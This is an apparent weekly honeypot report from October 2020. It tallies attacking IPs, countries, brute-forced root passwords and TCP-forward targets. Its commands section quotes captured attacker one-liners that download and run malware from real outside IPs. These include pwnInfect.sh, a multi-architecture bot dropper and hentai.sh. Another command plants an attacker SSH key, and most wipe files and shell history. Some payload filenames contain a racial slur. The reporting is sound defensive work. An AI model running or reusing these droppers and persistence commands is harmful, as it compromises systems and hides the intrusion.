Honey Pot – Previous week 25 October 2020

This week we have seen an increase in activity to the Honey Pot with a recorded 848 IP’s from 71 Different Countries. The number of successful login combos has dropped and the TCP forward has remained stable.

Total attacking IPs: 848
Total Countries: 71
Total User/pass successful combos: 546
Total Commands ran: 204
Total TCP Forward: 16720

The same Top IP ranges are still hitting the Honey Pot from Ireland. Nothing has really changed in the top 30 IP’s

5636 5.188.86.165
5455 5.188.86.167
5299 5.188.86.206
5234 5.188.87.57
5154 5.188.86.178
5102 5.188.86.168
5050 5.188.87.49
5031 5.188.86.212
4793 5.188.87.58
4771 5.188.86.221
4677 45.227.255.207
4432 5.188.87.60
4417 5.188.86.207
4361 5.188.86.169
4243 5.188.86.210
4232 5.188.86.164
3930 45.227.255.206
3842 5.188.87.51
3725 5.188.86.216
3614 5.188.87.53
3187 45.227.255.162
1831 45.227.255.161
1487 218.4.170.222
1341 88.214.26.91
1169 14.152.73.14
1127 120.240.95.157
1050 5.182.39.61
1018 88.214.26.92
967 5.182.39.64
913 5.182.39.63

The Rise of China hitting the Honey Pot with almost doubling the number of American IP addresses. We still see the same number of IP’s from Ireland which you can see in the Top 30.

243 China
139 United States
56 France
49 Russia
31 Singapore
29 Germany
20 Netherlands
20 India
19 Brazil
18 Ireland
18 Vietnam
15 South Korea
14 Canada
14 Indonesia
12 Panama
12 Italy
11 United Kingdom
9 Republic of Lithuania
9 Poland
7 Hong Kong
6 Romania
6 Japan
6 South Africa
5 Iran
5 Argentina
4 Colombia
4 Thailand
3 Sweden
3 Republic of Moldova
3 Chile

Still the most common Username Password Combo is root/admin with over 10,000 login attempts followed by 198 logins for root/1234.

107558 root/admin
198 root/1234
137 root/root
49 root/password
38 root/123456
28 root/1q2w3e4r5t
27 root/12345678
24 root/carlos
23 root/freedom
23 root/123

Compared to last week we have seen a 3 fold increase in commands ran directly in the Honey Pot. Reviewing some of the IP’s which are referencing payloads, The resources have been disabled. We also continue seeing the Hentai attack. This weeks Top command this week is ‘uname -a’

462 uname -a
250 uname -s -v -n -r
202 echo “PROC:nproc VER:uname -a“
164 cat /proc/cpuinfo | grep name | wc -l
164 cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’
164 free -m | grep Mem | awk ‘{print $2 ,$3, $4, $5, $6, $7}’
163 ls -lh $(which ls)
163 which ls
163 crontab -l
162 w
162 uname -m
162 cat /proc/cpuinfo | grep model | grep name | wc -l
162 top
162 uname
162 lscpu | grep Model
160 cd ~ && rm -rf .ssh && mkdir .ssh && echo “ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr”>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
131 cat /etc/issue
64 uname -a;nproc
20 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.109/Otpzl/7rtya.x86; curl -O http://193.228.91.109/Otpzl/7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 Exploit.x86; rm -rf 7rtya.x86; tftp 193.228.91.109 -c get 7rtya.x86; chmod +x 7rtya.x86; ./7rtya.x86 TFTP.Exploit.x86;rm -rf 7rtya.x86; history -c
18 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.123/pwnInfect.sh; curl -O http://193.228.91.123/pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp 193.228.91.123 -c get pwnInfect.sh; chmod 777 pwnInfect.sh; sh pwnInfect.sh; tftp -r pwnInfect2.sh -g 193.228.91.123; chmod 777 pwnInfect2.sh; sh pwnInfect2.sh; ftpget -v -u anonymous -p anonymous -P 21 193.228.91.123 pwnInfect1.sh pwnInfect1.sh; sh pwnInfect1.sh; rm -rf pwnInfect.sh pwnInfect.sh pwnInfect2.sh pwnInfect1.sh; rm -rf *
17 cat /etc/issue ; wget http://45.153.203.197/nigga.x86 ; curl -O http://45.153.203.197/nigga.x86 ; chmod 777 nigga.x86 ; ./nigga.x86 0day.autoroot.x86 ; wget http://45.153.203.197/nigga ; curl -O http://45.153.203.197/nigga.x32 ; chmod 777 nigga.x32 ; ./nigga.x32 0day.autoroot ; wget http://45.153.203.197/nigga.mips ; curl -O http://45.153.203.197/nigga.mips ; chmod 777 nigga.mips ; ./nigga.mips 0day.autoroot.mips ; wget http://45.153.203.197/nigga.arm ; curl -O http://45.153.203.197/.arm ; chmod 777 nigga.arm ; ./nigga.arm 0day.autoroot ; wget http://45.153.203.197/nigga.arm5 ; curl -O http://45.153.203.197/nigga.arm5 ; chmod 777 nigga.arm5 ; ./nigga.arm5 0day.autoroot ; wget http://45.153.203.197/nigga.arm6 ; curl -O http://45.153.203.197/nigga.arm6 ; chmod 777 nigga.arm6 ; ./nigga.arm6 0day.autoroot ; wget http://45.153.203.197/nigga.arm7 ; curl -O http://45.153.203.197/nigga.arm7 ; chmod 777 nigga.arm7 ; ./nigga.arm7 0day.autoroot ; wget http://45.153.203.197/nigga.ppc ; curl -O http://45.153.203.197/.ppc ; chmod 777 nigga.ppc ; ./nigga.ppc 0day.autoroot ; wget http://45.153.203.197/nigga.sh4 ; curl -O http://45.153.203.197/nigga.sh4 ; chmod 777 nigga.sh4 ; ./nigga.sh4 0day.autoroot ; wget http://45.153.203.197/nigga.m68k ; curl -O http://45.153.203.197/nigga.m68k ; chmod 777 nigga.m68k ; ./nigga.m68k 0day.autoroot ; rm -rf nigga* ; r9gj http://45.153.203.197/bot.pl ; perl bot.pl ; curl -O http://45.153.203.197/bot.pl ; perl bot.pl ; rm -rf bot* ; rm -rf bot* ; history -c
14 wget 88.218.16.87/wash.sh curl -O http://88.218.16.87/wash.sh; chmod 777 wash.sh; sh wash.sh
12 cd /tmp || cd /run || cd /; wget http://104.168.195.213/Thorbins.sh; chmod 777 Thorbins.sh; sh Thorbins.sh; tftp 104.168.195.213 -c get Thortftp1.sh; chmod 777 Thortftp1.sh; sh Thortftp1.sh; tftp -r Thortftp2.sh -g 104.168.195.213; chmod 777 Thortftp2.sh; sh Thortftp2.sh; rm -rf Thorbins.sh Thortftp1.sh Thortftp2.sh; rm -rf *
9 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.142/hentai.sh; curl -O http://194.180.224.142/hentai.sh; chmod 777 hentai.sh; sh hentai.sh; tftp 194.180.224.142 -c get hentai.sh; chmod 777 hentai.sh; sh hentai.sh; tftp -r hentai2.sh -g 194.180.224.142; chmod 777 hentai2.sh; sh hentai2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.142 hentai1.sh hentai1.sh; sh hentai1.sh; rm -rf hentai.sh hentai.sh hentai2.sh hentai1.sh; rm -rf *
7 wget http://23.95.186.183/wash.sh; curl -O http://23.95.186.183/wash.sh; chmod 777 wash.sh; sh wash.sh
3 /ip cloud print
3 ifconfig
3 cat /proc/cpuinfo
3 ps | grep ‘[Mm]iner’
3 ps -ef | grep ‘[Mm]iner’

We continue seeing the domination of TCP Forward request to Ya.ru (Yandex.ru). This has stayed around the same number of attacks. We also see an attack against Evernote.com (a Note taking app) targeting port 443.

78430 ya.ru:80
11044 www.evernote.com:443
6503 oauth.vk.com:443
6159 youtube.com:443
5892 23.60.196.214:443
5035 m.youtube.com:443
4719 51.159.19.168:80
4033 www.youtube.com:443
3877 www.google.com:443
3766 iforgot.apple.com:443
3748 www.amazon.com:443
3386 omegle.com:80
3281 api.sendspace.com:443
3245 69.195.128.18:80
2624 96.43.128.70:80
2581 ip.bablosoft.com:80
2452 74.125.137.27:25
2373 appleid.apple.com:443
2295 173.194.201.26:25
2001 108.177.97.27:25
1973 soundcloud.com:443
1770 74.125.28.26:25
1714 74.125.28.27:25
1691 64.233.162.27:25
1619 151.101.38.214:443
1587 108.177.97.26:25
1472 www.walmart.com:443
1354 67.195.204.75:25
1348 api.portis.io:443
1345 173.194.73.26:25

It is interesting to see the increase in traffic and malicious requests coming in. Lets see if the trend of China continues or does a new country take number 1.